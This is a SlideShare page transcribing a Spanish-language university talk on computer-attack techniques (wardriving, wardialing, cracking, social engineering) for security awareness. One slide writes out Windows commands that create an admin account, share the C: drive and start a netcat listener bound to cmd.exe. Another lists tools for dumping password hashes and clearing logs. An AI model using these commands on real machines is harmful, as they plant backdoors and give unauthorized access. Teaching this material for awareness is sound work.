Seguridad Informática

  • 242 views
Uploaded on

Conferencia Esp. Siler Amador

Conferencia Esp. Siler Amador

More in: Education
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Be the first to comment
    Be the first to like this
No Downloads

Views

Total Views
242
On Slideshare
0
From Embeds
0
Number of Embeds
0

Actions

Shares
Downloads
8
Comments
0
Likes
0

Embeds 0

No embeds

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
    No notes for slide

Transcript

  • 1. TÉCNICAS DE ATAQUE ENSEGURIDAD INFORMÁTICAGrupo de I+D en Tecnologías de laInformación (GTI)(Esp) Siler Amador Donadosamador@unicauca.edu.cohttp://gseguridad.unicauca.edu.co
  • 2. AGENDA Hackers vs Crackers El riesgo en la seguridad informática Pérdidas económicas por ataques informáticos Técnicas de ataque Vectores de ataque a una red Y si tienen la oportunidad… Caja de herramientas de ataque La próxima generación de Troyanos Keylogers Demo (Ataque Masivo) … Y en la Unicauca que? Conclusiones
  • 3. HACKERS VS CRACKERSHackers Crackers
  • 4. EL RIESGO EN LA SEGURIDADINFORMÁTICA
  • 5. PÉRDIDAS POR ATAQUESCCS/FBI
  • 6. PÉRDIDAS POR ATAQUESCCS/FBI$67.2 billones por año$7.6 millones por hora
  • 7. TECNICAS DE ATAQUEWardriving: Nombre que recibe la búsqueda de redesinalámbricas para documentar su posición. Para realizar estabúsqueda se necesita como mínimo un equipo móvil (portátil) contarjeta Wireless, y si queremos que la posición sea precisa, un GPSpara pasar los datos a un mapa.Objetivo: Conectarse al punto de acceso (AP) mal configurado eingresar a la la red local de la empresa.Herramientas: NetStumbler Kismet http://www.wardrive.net/wardriving/tools
  • 8. TECNICAS DE ATAQUEWardialing: Fue una técnica de los 80´s y 90´s, consitía enmarcar repetidamente a modems y PBX´s disponibles en la red y deesta forma irrumpir a sistemas remotos.Objetivo: Conectarse a modems o PBX´s mal configurados eingresar a la la red local de la empresa.Herramientas: THC-Scan 2.0 ModemScan ShokDial
  • 9. TECNICAS DE ATAQUECracking: Modificar un programa para obtener beneficios.Normalmente se basa en quitar pantallas introductorias,protecciones o, como en unas modificaciones de cierto programa decomunicaciones, conseguir nuevos passwords de acceso asistemas.Objetivo:Tener acceso al software o a la red interna.Herramientas: Las 100 mejores http://sectools.org/ Inyección SQL XSS
  • 10. TECNICAS DE ATAQUEIng. Social: Persuadir a otra persona (a través de diversasformas) para que nos de un dato útil para cumplir un objetivo. Estedato puede ser un password, un código, etc. incluso pueden darnombres de familiares y fechas importantes, que siempre se usanpara formar claves.Objetivo: Obtener información sensible que nos permita elacceso a la red.Herramientas: Teléfono Mucha psicología Inteligencia emocional http://www.laflecha.net/perfiles/tecnologia/kevin_mitnick/
  • 11. VECTORES DE ATAQUE A UNA REDPuntos de accesoINTERNETMODEMWIRELESSFISICOREDWardrivingIng. SocialWardialingCracking
  • 12. Y si tienen la oportunidad… Menos de 1 minuto es suficiente para:1. Crear una cuenta con privilegios de Admin!!!1. Abrir la consola de comandos2. C:net user fusm2010 fusm2010 /add3. C:net localgroup administradores fusm2010 /add2. Compartir toda la unidad del disco!!!1. C:net share fusm2010=c: /remark:”Demo fusm2010”3. Colocar un programa en escucha!!!1. http://gseguridad.unicauca.edu.co/nc.exe2. C:WINNTSystem32nc.exe -d -L -p 55555 -e cmd.exe
  • 13. Caja de Herramientas de ataque enlínea de comandosfport.exe - shows open ports and the process that owns the portiplist.exe - enumerates the ips of the computermd5.exe - gets the md5 hash of a filepw2kget.exe - for win2k gets the password of the currently logged on userpwreveal.exe - gets the passwords of any window that has a ****** editboxregshell.exe - a commandline registry explorer/editorsendmail.exe - a commandline email senderuptime.exe - gets the machines current uptimexwhois - advanced whois lookupScreencap.exe - makes a screenshot of the screen and saves it to screenshot.bmpCMDget.exe - Downloads a file from a website from user provided parameterswebscr.exe - creates a snapshot from the webcam and saves itshutd.exe - program that forces shutdown/reboot of machinebnc.exe - bnc for windows (see bnc.cfg)clslog.exe - clears app/security/system logs XP/NT/2kenum.exe - enumerates IPC$ share to collect informationwinfo.exe - enumerates IPC$ share to collect informationFTPd.exe - small ftp server for dos (see slimftpd.conf)Global.exe - process dos command on all disc/subdirsiislog.exe - clears IIS logsInfo.exe - gets system informationispc.exe - spawns shell on hacked IIS (put idq.dll on remote script dir)nc.exe - netcatpv.exe - process manager for dosPwdump.exe - dumps SAM hashesscrnmode.exe - change screen mode from dosunrar.exe - unrar for doswget.exe - wget for windowswizmo.exe - command tool (see w.txt)dwpp.exe - dial up password graberwinrelay.exe - relay tcp/udp connectionsgetad.exe - escalate to admin user in w2kpipeup.exe - escalate to admin user in w2kdnsid - identify remore dns serverAgradecimientos a: NetrangerTomado de: http://www.governmentsecurity.org/forum/lofiversion/index.php/t2824.html
  • 14. LA PRÓXIMA GENERACION DETROYANOS KEYLOGERS…http://www.hispasec.com/laboratorio/troyano_video.htmVIDEO
  • 15. EJEMPLO DE ATAQUE MASIVO EscenarioINTERNET LANATACANTE MAESTROZOMBIESLinux/WindowsMetasploitScripts en PythonLinux-BackTrack4Win/XP/2Khttp://www.microsoft.com/spain/technet/seguridad/boletines/ms05-039-it.mspx
  • 16. ... Y en la Unicauca que?• Electiva de seguridad informática• Área de interés en seguridad informática del GTI. (Proyectos de tesisde grado)• Legislación en comercio electrónico (Finalizado)• OBSES (Firewall Cluster Beowulf) (Finalizado)• INFORCE (Finalizado)• Antivirus-inteligente (En desarrollo)• Estudio de las tendencias predictivas sobre la escogencia decontraseñas basado en redes bayesianas (Finalizado)• Proyecto SGSI en UNICAUCA (En desarrollo)• PublicacionesPreocupación del departamento de sistemas de la FIET sobre laproblemática de la seguridad de la información en Colombia.
  • 17. CONCLUSIONES Los ataques de seguridad informática a nivel mundial sonaislados? Inversión en guerra informática? ECHELON,ENFOPOL, CARNÍVORO…• USA• UK• CHINA• RUSIA Los sistemas de seguridad actuales son reactivos y correctivos.• Preventivos• Inteligentes Existen demasiadas herramientas de ataque gratis ydisponibles en la red. Las técnicas de ataque cambian constantemente. Segun las estadísticas es muy probable que su sistemahaya sido vulnerado y usted aún no lo sepa!!!.